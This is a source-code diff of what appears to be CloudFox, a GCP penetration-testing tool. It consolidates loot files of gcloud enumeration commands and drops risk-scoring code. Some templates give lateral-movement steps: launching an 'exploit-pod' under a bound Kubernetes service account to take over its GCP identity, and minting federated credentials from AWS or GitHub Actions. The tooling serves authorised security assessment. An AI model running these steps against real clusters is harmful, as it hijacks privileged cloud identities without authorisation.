"vpcsc-protected-projects", - Contents: "", + m.LootMap["vpcsc-commands"] = &internal.LootFile{ + Name: "vpcsc-commands", + Contents: "# VPC Service Controls Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } func (m *VPCSCModule) addAllToLoot() { + // Add policies to loot + for _, policy := range m.Policies { + m.LootMap["vpcsc-commands"].Contents += fmt.Sprintf( + "# ==========================================\n"+ + "# POLICY: %s\n"+ + "# ==========================================\n"+ + "# Title: %s\n"+ + "# Parent: %s\n"+ + "\n# Describe access policy:\n"+ + "gcloud access-context-manager policies describe %s\n\n"+ + "# List perimeters:\n"+ + "gcloud access-context-manager perimeters list --policy=%s\n\n"+ + "# List access levels:\n"+ + "gcloud access-context-manager levels list --policy=%s\n\n", + policy.Name, policy.Title, policy.Parent, + policy.Name, policy.Name, policy.Name, + ) + } + + // Add perimeters to loot for _, perimeter := range m.Perimeters { - m.LootMap["vpcsc-perimeters"].Contents += fmt.Sprintf( - "# Perimeter: %s\n# Type: %s\n# Resources: %d\n# Restricted Services: %d\n\n", + m.LootMap["vpcsc-commands"].Contents += fmt.Sprintf( + "# ------------------------------------------\n"+ + "# PERIMETER: %s (Policy: %s)\n"+ + "# ------------------------------------------\n"+ + "# Title: %s\n"+ + "# Type: %s\n"+ + "# Resources: %d\n"+ + "# Restricted Services: %d\n"+ + "# Ingress Policies: %d\n"+ + "# Egress Policies: %d\n"+ + "\n# Describe perimeter:\n"+ + "gcloud access-context-manager perimeters describe %s --policy=%s\n\n"+ + "# List protected resources:\n"+ + "gcloud access-context-manager perimeters describe %s --policy=%s --format=\"value(status.resources)\"\n\n", + perimeter.Name, perimeter.PolicyName, perimeter.Title, perimeter.PerimeterType, - len(perimeter.Resources), len(perimeter.RestrictedServices)) + len(perimeter.Resources), len(perimeter.RestrictedServices), + perimeter.IngressPolicyCount, perimeter.EgressPolicyCount, + perimeter.Name, perimeter.PolicyName, + perimeter.Name, perimeter.PolicyName, + ) + } - for _, resource := range perimeter.Resources { - m.LootMap["vpcsc-protected-projects"].Contents += resource + "\n" + // Add access levels to loot + for _, level := range m.AccessLevels { + ipSubnets := "-" + if len(level.IPSubnetworks) > 0 { + ipSubnets = strings.Join(level.IPSubnetworks, ", ") + } + regions := "-" + if len(level.Regions) > 0 { + regions = strings.Join(level.Regions, ", ") } + + m.LootMap["vpcsc-commands"].Contents += fmt.Sprintf( + "# ------------------------------------------\n"+ + "# ACCESS LEVEL: %s (Policy: %s)\n"+ + "# ------------------------------------------\n"+ + "# Title: %s\n"+ + "# IP Subnets: %s\n"+ + "# Regions: %s\n"+ + "# Members: %d\n"+ + "\n# Describe access level:\n"+ + "gcloud access-context-manager levels describe %s --policy=%s\n\n", + level.Name, level.PolicyName, + level.Title, ipSubnets, regions, len(level.Members), + level.Name, level.PolicyName, + ) } } @@ -170,7 +236,7 @@ func (m *VPCSCModule) writeOutput(ctx context.Context, logger internal.Logger) { // Access Policies table if len(m.Policies) > 0 { - policyHeader := []string{"Name", "Title", "Parent", "Created", "Updated"} + policyHeader := []string{"Policy", "Title", "Parent", "Created", "Updated"} var policyBody [][]string for _, policy := range m.Policies { policyBody = append(policyBody, []string{ @@ -191,12 +257,13 @@ func (m *VPCSCModule) writeOutput(ctx context.Context, logger internal.Logger) { // Service Perimeters table if len(m.Perimeters) > 0 { perimeterHeader := []string{ - "Name", "Title", "Type", "Resources", "Restricted Services", - "Ingress Policies", "Egress Policies", "Risk", "Policy", + "Policy", "Name", "Title", "Type", "Resources", "Restricted Services", + "Ingress Policies", "Egress Policies", } var perimeterBody [][]string for _, perimeter := range m.Perimeters { perimeterBody = append(perimeterBody, []string{ + perimeter.PolicyName, perimeter.Name, perimeter.Title, perimeter.PerimeterType, @@ -204,8 +271,6 @@ func (m *VPCSCModule) writeOutput(ctx context.Context, logger internal.Logger) { fmt.Sprintf("%d", len(perimeter.RestrictedServices)), fmt.Sprintf("%d", perimeter.IngressPolicyCount), fmt.Sprintf("%d", perimeter.EgressPolicyCount), - perimeter.RiskLevel, - perimeter.PolicyName, }) } tables = append(tables, internal.TableFile{ @@ -215,20 +280,43 @@ func (m *VPCSCModule) writeOutput(ctx context.Context, logger internal.Logger) { }) } - // Access Levels table + // Access Levels table - one row per member if len(m.AccessLevels) > 0 { - levelHeader := []string{"Name", "Title", "IP Subnets", "Regions", "Members", "Risk", "Policy"} + levelHeader := []string{"Policy", "Name", "Title", "IP Subnets", "Regions", "Member"} var levelBody [][]string for _, level := range m.AccessLevels { - levelBody = append(levelBody, []string{ - level.Name, - level.Title, - strings.Join(level.IPSubnetworks, ", "), - strings.Join(level.Regions, ", "), - fmt.Sprintf("%d", len(level.Members)), - level.RiskLevel, - level.PolicyName, - }) + ipSubnets := "-" + if len(level.IPSubnetworks) > 0 { + ipSubnets = strings.Join(level.IPSubnetworks, ", ") + } + regions := "-" + if len(level.Regions) > 0 { + regions = strings.Join(level.Regions, ", ") + } + + if len(level.Members) > 0 { + // One row per member + for _, member := range level.Members { + levelBody = append(levelBody, []string{ + level.PolicyName, + level.Name, + level.Title, + ipSubnets, + regions, + member, + }) + } + } else { + // Access level with no members + levelBody = append(levelBody, []string{ + level.PolicyName, + level.Name, + level.Title, + ipSubnets, + regions, + "-", + }) + } } tables = append(tables, internal.TableFile{ Name: "vpcsc-access-levels", @@ -237,40 +325,9 @@ func (m *VPCSCModule) writeOutput(ctx context.Context, logger internal.Logger) { }) } - // High-risk findings table - var highRiskBody [][]string - for _, perimeter := range m.Perimeters { - if perimeter.RiskLevel == "HIGH" || perimeter.RiskLevel == "MEDIUM" { - highRiskBody = append(highRiskBody, []string{ - "Perimeter", - perimeter.Name, - perimeter.RiskLevel, - strings.Join(perimeter.RiskReasons, "; "), - }) - } - } - for _, level := range m.AccessLevels { - if level.RiskLevel == "HIGH" || level.RiskLevel == "MEDIUM" { - highRiskBody = append(highRiskBody, []string{ - "AccessLevel", - level.Name, - level.RiskLevel, - strings.Join(level.RiskReasons, "; "), - }) - } - } - - if len(highRiskBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "vpcsc-risks", - Header: []string{"Type", "Name", "Risk Level", "Reasons"}, - Body: highRiskBody, - }) - } - var lootFiles []internal.LootFile for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } diff --git a/gcp/commands/whoami.go b/gcp/commands/whoami.go index 1dca6e31..c8a2fd83 100644 --- a/gcp/commands/whoami.go +++ b/gcp/commands/whoami.go @@ -1035,7 +1035,7 @@ func (m *WhoAmIModule) writeOutput(ctx context.Context, logger internal.Logger) path.Name, path.Risk, path.Description, - truncateString(path.Command, 50), + path.Command, }) } diff --git a/gcp/commands/workloadidentity.go b/gcp/commands/workloadidentity.go index a472eaab..7f5a3c73 100644 --- a/gcp/commands/workloadidentity.go +++ b/gcp/commands/workloadidentity.go @@ -150,23 +150,8 @@ func (m *WorkloadIdentityModule) Execute(ctx context.Context, logger internal.Lo // Count federation findings if hasFederation { - criticalCount := 0 - highCount := 0 - for _, p := range m.Providers { - switch p.RiskLevel { - case "CRITICAL": - criticalCount++ - case "HIGH": - highCount++ - } - } - logger.SuccessM(fmt.Sprintf("Found %d Workload Identity Pool(s), %d Provider(s), %d federated binding(s)", len(m.Pools), len(m.Providers), len(m.FederatedBindings)), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) - - if criticalCount > 0 || highCount > 0 { - logger.InfoM(fmt.Sprintf("[PENTEST] Found %d CRITICAL, %d HIGH risk federation provider(s)!", criticalCount, highCount), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) - } } // Write output @@ -416,51 +401,23 @@ func isHighPrivilegeServiceAccount(sa IAMService.ServiceAccountInfo) bool { // Loot File Management // ------------------------------ func (m *WorkloadIdentityModule) initializeLootFiles() { - // GKE Workload Identity loot - m.LootMap["wi-clusters"] = &internal.LootFile{ - Name: "wi-clusters", - Contents: "# GKE Clusters with Workload Identity\n# Generated by CloudFox\n\n", - } - m.LootMap["wi-bindings"] = &internal.LootFile{ - Name: "wi-bindings", - Contents: "# Workload Identity Bindings\n# Generated by CloudFox\n# K8s SA -> GCP SA mappings\n\n", - } - m.LootMap["wi-high-privilege"] = &internal.LootFile{ - Name: "wi-high-privilege", - Contents: "# High-Privilege Workload Identity Bindings\n# Generated by CloudFox\n# These K8s service accounts have access to high-privilege GCP SAs\n\n", - } - m.LootMap["wi-exploit-commands"] = &internal.LootFile{ - Name: "wi-exploit-commands", - Contents: "# Workload Identity Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", - } - - // Workload Identity Federation loot - m.LootMap["wi-federation-pools"] = &internal.LootFile{ - Name: "wi-federation-pools", - Contents: "# Workload Identity Federation Pools\n# Generated by CloudFox\n\n", - } - m.LootMap["wi-federation-providers"] = &internal.LootFile{ - Name: "wi-federation-providers", - Contents: "# Workload Identity Federation Providers\n# Generated by CloudFox\n# External identity providers (AWS, OIDC, SAML)\n\n", - } - m.LootMap["wi-federation-risky"] = &internal.LootFile{ - Name: "wi-federation-risky", - Contents: "# Risky Workload Identity Federation Configurations\n# Generated by CloudFox\n# Providers with security concerns\n\n", - } - m.LootMap["wi-federation-exploit"] = &internal.LootFile{ - Name: "wi-federation-exploit", - Contents: "# Workload Identity Federation Exploitation\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + m.LootMap["workloadidentity-commands"] = &internal.LootFile{ + Name: "workloadidentity-commands", + Contents: "# Workload Identity Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } func (m *WorkloadIdentityModule) addClusterToLoot(cwi ClusterWorkloadIdentity) { if cwi.WorkloadPoolEnabled { - m.LootMap["wi-clusters"].Contents += fmt.Sprintf( - "# Cluster: %s\n"+ + m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + "# ==========================================\n"+ + "# GKE CLUSTER: %s\n"+ + "# ==========================================\n"+ "# Location: %s\n"+ "# Project: %s\n"+ "# Workload Pool: %s\n"+ "# Node Pools with WI: %d/%d\n"+ + "\n# Get cluster credentials:\n"+ "gcloud container clusters get-credentials %s --zone=%s --project=%s\n\n", cwi.ClusterName, cwi.Location, @@ -476,50 +433,37 @@ func (m *WorkloadIdentityModule) addClusterToLoot(cwi ClusterWorkloadIdentity) { } func (m *WorkloadIdentityModule) addBindingToLoot(binding WorkloadIdentityBinding) { - // All bindings - m.LootMap["wi-bindings"].Contents += fmt.Sprintf( - "# K8s SA: %s/%s\n"+ - "# GCP SA: %s\n"+ + highPriv := "" + if binding.IsHighPrivilege { + highPriv = " [HIGH PRIVILEGE]" + } + + m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + "# ------------------------------------------\n"+ + "# K8s SA BINDING: %s/%s -> %s%s\n"+ + "# ------------------------------------------\n"+ "# Cluster: %s (%s)\n"+ - "# Project: %s\n\n", + "# Project: %s\n", binding.KubernetesNS, binding.KubernetesSA, binding.GCPServiceAccount, + highPriv, binding.ClusterName, binding.ClusterLocation, binding.ProjectID, ) - // High-privilege bindings - if binding.IsHighPrivilege { - m.LootMap["wi-high-privilege"].Contents += fmt.Sprintf( - "# K8s SA: %s/%s -> GCP SA: %s\n"+ - "# Cluster: %s\n"+ - "# Roles: %s\n"+ - "# This K8s SA can access high-privilege GCP permissions!\n\n", - binding.KubernetesNS, - binding.KubernetesSA, - binding.GCPServiceAccount, - binding.ClusterName, + if binding.IsHighPrivilege && len(binding.GCPSARoles) > 0 { + m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + "# GCP SA Roles: %s\n", strings.Join(binding.GCPSARoles, ", "), ) } - // Exploitation commands - m.LootMap["wi-exploit-commands"].Contents += fmt.Sprintf( - "# To exploit K8s SA %s/%s -> GCP SA %s:\n"+ - "# 1. Get credentials for cluster:\n"+ - "gcloud container clusters get-credentials %s --zone=%s --project=%s\n"+ - "# 2. Create a pod with the K8s service account:\n"+ + m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + "\n# To exploit, create pod with this service account:\n"+ "# kubectl run exploit-pod --image=google/cloud-sdk:slim --serviceaccount=%s -n %s -- sleep infinity\n"+ - "# 3. Exec into pod and use GCP credentials:\n"+ "# kubectl exec -it exploit-pod -n %s -- gcloud auth list\n\n", - binding.KubernetesNS, - binding.KubernetesSA, - binding.GCPServiceAccount, - binding.ClusterName, - binding.ClusterLocation, - binding.ProjectID, binding.KubernetesSA, binding.KubernetesNS, binding.KubernetesNS, @@ -531,86 +475,102 @@ func (m *WorkloadIdentityModule) addPoolToLoot(pool workloadidentityservice.Work if pool.Disabled { status = "Disabled" } - m.LootMap["wi-federation-pools"].Contents += fmt.Sprintf( - "## Pool: %s\n"+ - "## Project: %s\n"+ - "## Status: %s\n"+ - "## Description: %s\n\n", + m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + "# ==========================================\n"+ + "# FEDERATION POOL: %s\n"+ + "# ==========================================\n"+ + "# Project: %s\n"+ + "# Display Name: %s\n"+ + "# State: %s (%s)\n"+ + "# Description: %s\n"+ + "\n# Describe pool:\n"+ + "gcloud iam workload-identity-pools describe %s --location=global --project=%s\n\n"+ + "# List providers:\n"+ + "gcloud iam workload-identity-pools providers list --workload-identity-pool=%s --location=global --project=%s\n\n", pool.PoolID, pool.ProjectID, - status, + pool.DisplayName, + pool.State, status, pool.Description, + pool.PoolID, pool.ProjectID, + pool.PoolID, pool.ProjectID, ) } func (m *WorkloadIdentityModule) addProviderToLoot(provider workloadidentityservice.WorkloadIdentityProvider) { - m.LootMap["wi-federation-providers"].Contents += fmt.Sprintf( - "## Provider: %s/%s\n"+ - "## Project: %s\n"+ - "## Type: %s\n", + m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + "# ------------------------------------------\n"+ + "# PROVIDER: %s/%s (%s)\n"+ + "# ------------------------------------------\n"+ + "# Project: %s\n", provider.PoolID, provider.ProviderID, - provider.ProjectID, provider.ProviderType, + provider.ProjectID, ) if provider.ProviderType == "AWS" { - m.LootMap["wi-federation-providers"].Contents += fmt.Sprintf( - "## AWS Account: %s\n", provider.AWSAccountID) + m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + "# AWS Account: %s\n", provider.AWSAccountID) } else if provider.ProviderType == "OIDC" { - m.LootMap["wi-federation-providers"].Contents += fmt.Sprintf( - "## OIDC Issuer: %s\n", provider.OIDCIssuerURI) + m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + "# OIDC Issuer: %s\n", provider.OIDCIssuerURI) } if provider.AttributeCondition != "" { - m.LootMap["wi-federation-providers"].Contents += fmt.Sprintf( - "## Attribute Condition: %s\n", provider.AttributeCondition) + m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + "# Attribute Condition: %s\n", provider.AttributeCondition) } else { - m.LootMap["wi-federation-providers"].Contents += "## Attribute Condition: NONE (any identity can authenticate!)\n" - } - m.LootMap["wi-federation-providers"].Contents += "\n" - - // Risky providers - if provider.RiskLevel == "CRITICAL" || provider.RiskLevel == "HIGH" { - m.LootMap["wi-federation-risky"].Contents += fmt.Sprintf( - "## [%s] Provider: %s/%s\n"+ - "## Project: %s\n"+ - "## Type: %s\n", - provider.RiskLevel, provider.PoolID, provider.ProviderID, - provider.ProjectID, provider.ProviderType, - ) - if len(provider.RiskReasons) > 0 { - m.LootMap["wi-federation-risky"].Contents += "## Risk Reasons:\n" - for _, reason := range provider.RiskReasons { - m.LootMap["wi-federation-risky"].Contents += fmt.Sprintf("## - %s\n", reason) - } - } - m.LootMap["wi-federation-risky"].Contents += "\n" + m.LootMap["workloadidentity-commands"].Contents += "# Attribute Condition: NONE\n" } - // Exploitation commands - if len(provider.ExploitCommands) > 0 { - m.LootMap["wi-federation-exploit"].Contents += fmt.Sprintf( - "## [%s] Provider: %s/%s (%s)\n", - provider.RiskLevel, provider.PoolID, provider.ProviderID, provider.ProviderType, + m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + "\n# Describe provider:\n"+ + "gcloud iam workload-identity-pools providers describe %s --workload-identity-pool=%s --location=global --project=%s\n\n", + provider.ProviderID, provider.PoolID, provider.ProjectID, + ) + + // Add exploitation guidance based on provider type + switch provider.ProviderType { + case "AWS": + m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + "# From AWS account %s, exchange credentials:\n"+ + "# gcloud iam workload-identity-pools create-cred-config \\\n"+ + "# projects/%s/locations/global/workloadIdentityPools/%s/providers/%s \\\n"+ + "# --aws --output-file=gcp-creds.json\n\n", + provider.AWSAccountID, + provider.ProjectID, provider.PoolID, provider.ProviderID, ) - for _, cmd := range provider.ExploitCommands { - m.LootMap["wi-federation-exploit"].Contents += cmd + "\n" + case "OIDC": + if strings.Contains(provider.OIDCIssuerURI, "github") { + m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + "# From GitHub Actions workflow, add:\n"+ + "# permissions:\n"+ + "# id-token: write\n"+ + "# contents: read\n"+ + "# Then use:\n"+ + "# gcloud iam workload-identity-pools create-cred-config \\\n"+ + "# projects/%s/locations/global/workloadIdentityPools/%s/providers/%s \\\n"+ + "# --service-account=TARGET_SA@PROJECT.iam.gserviceaccount.com \\\n"+ + "# --output-file=gcp-creds.json\n\n", + provider.ProjectID, provider.PoolID, provider.ProviderID, + ) } - m.LootMap["wi-federation-exploit"].Contents += "\n" } } func (m *WorkloadIdentityModule) addFederatedBindingToLoot(binding workloadidentityservice.FederatedIdentityBinding) { - m.LootMap["wi-federation-providers"].Contents += fmt.Sprintf( - "## Federated Binding:\n"+ - "## External Subject: %s\n"+ - "## GCP Service Account: %s\n"+ - "## Pool: %s\n"+ - "## Risk Level: %s\n\n", - binding.ExternalSubject, - binding.GCPServiceAccount, + m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + "# ------------------------------------------\n"+ + "# FEDERATED BINDING\n"+ + "# ------------------------------------------\n"+ + "# Pool: %s\n"+ + "# GCP Service Account: %s\n"+ + "# External Subject: %s\n"+ + "# Project: %s\n\n", binding.PoolID, - binding.RiskLevel, + binding.GCPServiceAccount, + binding.ExternalSubject, + binding.ProjectID, ) } @@ -620,13 +580,13 @@ func (m *WorkloadIdentityModule) addFederatedBindingToLoot(binding workloadident func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger internal.Logger) { // Clusters table clustersHeader := []string{ + "Project Name", + "Project ID", "Cluster", "Location", - "Project Name", - "Project", "WI Enabled", "Workload Pool", - "Node Pools (WI/Total)", + "Node Pools", } var clustersBody [][]string @@ -641,10 +601,10 @@ func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger interna } clustersBody = append(clustersBody, []string{ - cwi.ClusterName, - cwi.Location, m.GetProjectName(cwi.ProjectID), cwi.ProjectID, + cwi.ClusterName, + cwi.Location, wiEnabled, workloadPool, fmt.Sprintf("%d/%d", cwi.NodePoolsWithWI, cwi.TotalNodePools), @@ -653,57 +613,37 @@ func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger interna // Bindings table bindingsHeader := []string{ + "Project Name", + "Project ID", + "Cluster", "K8s Namespace", "K8s Service Account", "GCP Service Account", - "High Privilege", - "Cluster", - "Project Name", - "Project", + "High Priv", } var bindingsBody [][]string for _, binding := range m.Bindings { - highPriv := "" + highPriv := "No" if binding.IsHighPrivilege { - highPriv = "YES" + highPriv = "Yes" } bindingsBody = append(bindingsBody, []string{ + m.GetProjectName(binding.ProjectID), + binding.ProjectID, + binding.ClusterName, binding.KubernetesNS, binding.KubernetesSA, binding.GCPServiceAccount, highPriv, - binding.ClusterName, - m.GetProjectName(binding.ProjectID), - binding.ProjectID, }) } - // High-privilege bindings table - highPrivHeader := []string{ - "K8s SA (namespace/name)", - "GCP Service Account", - "Roles", - "Cluster", - } - - var highPrivBody [][]string - for _, binding := range m.Bindings { - if binding.IsHighPrivilege { - highPrivBody = append(highPrivBody, []string{ - fmt.Sprintf("%s/%s", binding.KubernetesNS, binding.KubernetesSA), - binding.GCPServiceAccount, - strings.Join(binding.GCPSARoles, ", "), - binding.ClusterName, - }) - } - } - // Collect loot files var lootFiles []internal.LootFile for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } @@ -726,16 +666,6 @@ func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger interna }) } - // Add high-privilege table if there are any - if len(highPrivBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "workload-identity-high-privilege", - Header: highPrivHeader, - Body: highPrivBody, - }) - logger.InfoM(fmt.Sprintf("[FINDING] Found %d high-privilege Workload Identity binding(s)!", len(highPrivBody)), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) - } - // ============================ // Workload Identity Federation tables // ============================ @@ -743,9 +673,9 @@ func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger interna // Federation Pools table if len(m.Pools) > 0 { poolsHeader := []string{ - "Pool ID", "Project Name", - "Project", + "Project ID", + "Pool ID", "Display Name", "State", "Disabled", @@ -758,9 +688,9 @@ func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger interna disabled = "Yes" } poolsBody = append(poolsBody, []string{ - pool.PoolID, m.GetProjectName(pool.ProjectID), pool.ProjectID, + pool.PoolID, pool.DisplayName, pool.State, disabled, @@ -777,44 +707,37 @@ func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger interna // Federation Providers table if len(m.Providers) > 0 { providersHeader := []string{ - "Risk", + "Project Name", + "Project ID", "Pool", "Provider", "Type", "Issuer/Account", "Attribute Condition", - "Project Name", - "Project", } var providersBody [][]string for _, p := range m.Providers { - issuerOrAccount := "" + issuerOrAccount := "-" if p.ProviderType == "AWS" { issuerOrAccount = p.AWSAccountID } else if p.ProviderType == "OIDC" { issuerOrAccount = p.OIDCIssuerURI - if len(issuerOrAccount) > 40 { - issuerOrAccount = issuerOrAccount[:40] + "..." - } } - attrCond := p.AttributeCondition - if attrCond == "" { - attrCond = "NONE" - } else if len(attrCond) > 30 { - attrCond = attrCond[:30] + "..." + attrCond := "-" + if p.AttributeCondition != "" { + attrCond = p.AttributeCondition } providersBody = append(providersBody, []string{ - p.RiskLevel, + m.GetProjectName(p.ProjectID), + p.ProjectID, p.PoolID, p.ProviderID, p.ProviderType, issuerOrAccount, attrCond, - m.GetProjectName(p.ProjectID), - p.ProjectID, }) } @@ -828,28 +751,21 @@ func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger interna // Federated bindings table if len(m.FederatedBindings) > 0 { fedBindingsHeader := []string{ - "Risk", + "Project Name", + "Project ID", "Pool", "GCP Service Account", "External Subject", - "Project Name", - "Project", } var fedBindingsBody [][]string for _, fb := range m.FederatedBindings { - externalSubject := fb.ExternalSubject - if len(externalSubject) > 50 { - externalSubject = externalSubject[:50] + "..." - } - fedBindingsBody = append(fedBindingsBody, []string{ - fb.RiskLevel, - fb.PoolID, - fb.GCPServiceAccount, - externalSubject, m.GetProjectName(fb.ProjectID), fb.ProjectID, + fb.PoolID, + fb.GCPServiceAccount, + fb.ExternalSubject, }) } @@ -876,9 +792,9 @@ func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger interna m.OutputDirectory, m.Verbosity, m.WrapTable, - "project", // scopeType - m.ProjectIDs, // scopeIdentifiers - scopeNames, // scopeNames + "project", + m.ProjectIDs, + scopeNames, m.Account, output, ) diff --git a/gcp/services/artifactRegistryService/artifactRegistryService.go b/gcp/services/artifactRegistryService/artifactRegistryService.go index cd8a7abc..541e634b 100644 --- a/gcp/services/artifactRegistryService/artifactRegistryService.go +++ b/gcp/services/artifactRegistryService/artifactRegistryService.go @@ -3,6 +3,7 @@ package artifactregistryservice import ( "context" "fmt" + "net/url" "strings" "time" @@ -294,11 +295,17 @@ func parseDockerImageName(imageName string) DockerImageDetails { imageName = imageAndDigest[0] digest := imageAndDigest[1] + // URL-decode the image name (e.g., "library%2Fnginx" -> "library/nginx") + decodedImageName, err := url.PathUnescape(imageName) + if err != nil { + decodedImageName = imageName // fallback to original if decode fails + } + return DockerImageDetails{ ProjectID: projectID, Location: location, Repository: repository, - ImageName: imageName, + ImageName: decodedImageName, Digest: digest, } } diff --git a/gcp/services/assetService/assetService.go b/gcp/services/assetService/assetService.go index 62fe1bb4..f56441f0 100644 --- a/gcp/services/assetService/assetService.go +++ b/gcp/services/assetService/assetService.go @@ -23,6 +23,12 @@ func NewWithSession(session *gcpinternal.SafeSession) *AssetService { return &AssetService{session: session} } +// IAMBinding represents an IAM binding +type IAMBinding struct { + Role string `json:"role"` + Members []string `json:"members"` +} + // AssetInfo represents a Cloud Asset type AssetInfo struct { Name string `json:"name"` @@ -36,14 +42,11 @@ type AssetInfo struct { CreateTime string `json:"createTime"` UpdateTime string `json:"updateTime"` - // IAM Policy summary - HasIAMPolicy bool `json:"hasIamPolicy"` - IAMBindings int `json:"iamBindings"` - PublicAccess bool `json:"publicAccess"` - - // Security analysis - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` + // IAM Policy details + HasIAMPolicy bool `json:"hasIamPolicy"` + IAMBindings []IAMBinding `json:"iamBindings"` + IAMBindingCount int `json:"iamBindingCount"` + PublicAccess bool `json:"publicAccess"` } // AssetTypeCount tracks count of assets by type @@ -259,10 +262,8 @@ func (s *AssetService) SearchAllResources(scope string, query string) ([]AssetIn State: resource.State, CreateTime: resource.CreateTime.String(), UpdateTime: resource.UpdateTime.String(), - RiskReasons: []string{}, } - info.RiskLevel, info.RiskReasons = s.analyzeAssetRisk(info) assets = append(assets, info) } @@ -271,87 +272,49 @@ func (s *AssetService) SearchAllResources(scope string, query string) ([]AssetIn func (s *AssetService) parseAsset(assetResult *assetpb.Asset, projectID string) AssetInfo { info := AssetInfo{ - Name: extractAssetName(assetResult.Name), - AssetType: assetResult.AssetType, - ProjectID: projectID, - RiskReasons: []string{}, + Name: extractAssetName(assetResult.Name), + AssetType: assetResult.AssetType, + ProjectID: projectID, } if assetResult.Resource != nil { info.Location = assetResult.Resource.Location - // Additional resource data parsing could be added here } - info.RiskLevel, info.RiskReasons = s.analyzeAssetRisk(info) - return info } func (s *AssetService) parseAssetWithIAM(assetResult *assetpb.Asset, projectID string) AssetInfo { info := AssetInfo{ - Name: extractAssetName(assetResult.Name), - AssetType: assetResult.AssetType, - ProjectID: projectID, - RiskReasons: []string{}, + Name: extractAssetName(assetResult.Name), + AssetType: assetResult.AssetType, + ProjectID: projectID, } if assetResult.IamPolicy != nil { info.HasIAMPolicy = true - info.IAMBindings = len(assetResult.IamPolicy.Bindings) + info.IAMBindingCount = len(assetResult.IamPolicy.Bindings) - // Check for public access + // Store actual bindings and check for public access for _, binding := range assetResult.IamPolicy.Bindings { + iamBinding := IAMBinding{ + Role: binding.Role, + Members: binding.Members, + } + info.IAMBindings = append(info.IAMBindings, iamBinding) + + // Check for public access for _, member := range binding.Members { if member == "allUsers" || member == "allAuthenticatedUsers" { info.PublicAccess = true - break } } - if info.PublicAccess { - break - } } } - info.RiskLevel, info.RiskReasons = s.analyzeAssetRisk(info) - return info } -func (s *AssetService) analyzeAssetRisk(asset AssetInfo) (string, []string) { - var reasons []string - score := 0 - - // Public access - if asset.PublicAccess { - reasons = append(reasons, "Resource has public access (allUsers or allAuthenticatedUsers)") - score += 3 - } - - // Sensitive asset types - sensitiveTypes := []string{ - "iam.googleapis.com/ServiceAccountKey", - "secretmanager.googleapis.com/Secret", - "cloudkms.googleapis.com/CryptoKey", - } - for _, sensitiveType := range sensitiveTypes { - if asset.AssetType == sensitiveType { - reasons = append(reasons, fmt.Sprintf("Sensitive asset type: %s", sensitiveType)) - score += 1 - break - } - } - - if score >= 3 { - return "HIGH", reasons - } else if score >= 2 { - return "MEDIUM", reasons - } else if score >= 1 { - return "LOW", reasons - } - return "INFO", reasons -} - func extractAssetName(fullName string) string { parts := strings.Split(fullName, "/") if len(parts) > 0 { diff --git a/gcp/services/beyondcorpService/beyondcorpService.go b/gcp/services/beyondcorpService/beyondcorpService.go index a29b8736..c1255654 100644 --- a/gcp/services/beyondcorpService/beyondcorpService.go +++ b/gcp/services/beyondcorpService/beyondcorpService.go @@ -21,36 +21,44 @@ func NewWithSession(session *gcpinternal.SafeSession) *BeyondCorpService { return &BeyondCorpService{session: session} } +// IAMBinding represents an IAM binding +type IAMBinding struct { + Role string `json:"role"` + Members []string `json:"members"` +} + // AppConnectorInfo represents a BeyondCorp app connector type AppConnectorInfo struct { - Name string `json:"name"` - ProjectID string `json:"projectId"` - Location string `json:"location"` - DisplayName string `json:"displayName"` - State string `json:"state"` - CreateTime string `json:"createTime"` - UpdateTime string `json:"updateTime"` - PrincipalInfo string `json:"principalInfo"` - ResourceInfo string `json:"resourceInfo"` - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` + Name string `json:"name"` + FullName string `json:"fullName"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + DisplayName string `json:"displayName"` + State string `json:"state"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + PrincipalInfo string `json:"principalInfo"` + ResourceInfo string `json:"resourceInfo"` + IAMBindings []IAMBinding `json:"iamBindings"` + PublicAccess bool `json:"publicAccess"` } // AppConnectionInfo represents a BeyondCorp app connection type AppConnectionInfo struct { - Name string `json:"name"` - ProjectID string `json:"projectId"` - Location string `json:"location"` - DisplayName string `json:"displayName"` - State string `json:"state"` - Type string `json:"type"` - 